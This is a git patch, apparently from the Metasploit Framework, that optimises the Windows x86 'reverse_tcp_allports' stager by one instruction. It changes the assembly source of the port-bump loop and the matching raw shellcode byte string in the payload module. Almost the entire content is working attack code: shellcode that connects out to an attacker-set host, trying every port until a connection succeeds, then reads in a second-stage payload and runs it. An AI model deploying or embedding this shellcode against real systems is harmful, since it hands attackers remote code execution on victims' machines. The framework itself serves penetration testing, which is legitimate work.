From bc2c38c33250e65d8714f50ef6169a0cdd730b6a Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 25 Sep 2009 06:13:13 +0000 Subject: [PATCH] shave an instruction from the new allports stager git-svn-id: file:///home/svn/framework3/trunk@7060 4d416f70-5f16-0410-b530-b9f4589650da --- .../src/block/block_reverse_tcp_allports.asm | 11 +++++------ .../stagers/windows/reverse_tcp_allports.rb | 17 +++++++++-------- 2 files changed, 14 insertions(+), 14 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm index 72995904c8..93ee3c48a0 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm @@ -40,6 +40,7 @@ set_address: push 0x5C110002 ; family AF_INET and port 1 mov esi, esp ; save pointer to sockaddr struct + xor ebx, ebx try_connect: push byte 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct @@ -51,12 +52,10 @@ try_connect: jz short connected port_bump: - xor eax, eax - mov word ax, [esi+2] - xchg ah,al - inc ax - xchg ah,al - mov word [esi+2], ax + xchg bh,bl + inc bx + xchg bh,bl + mov word [esi+2], bx jmp short try_connect connected: diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index f40d2df4c5..c60d952cf0 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -35,7 +35,7 @@ module Metasploit3 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, 'Payload' => - # Length: 294 bytes + # Length: 290 bytes # Port Offset: 202 # Host Offset: 195 "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -50,13 +50,14 @@ module Metasploit3 "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + - "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" + - "\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" + - "\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" + - "\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" + - "\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" + - "\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" + - "\xC6\x85\xF6\x75\xEC\xC3" + "\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x31\xDB" + + "\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\x86" + + "\xFB\x66\x43\x86\xFB\x66\x89\x5E\x02\xEB\xE5\x6A\x00\x6A\x04\x56" + + "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" + + "\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" + + "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" + + "\xEC\xC3" + } ))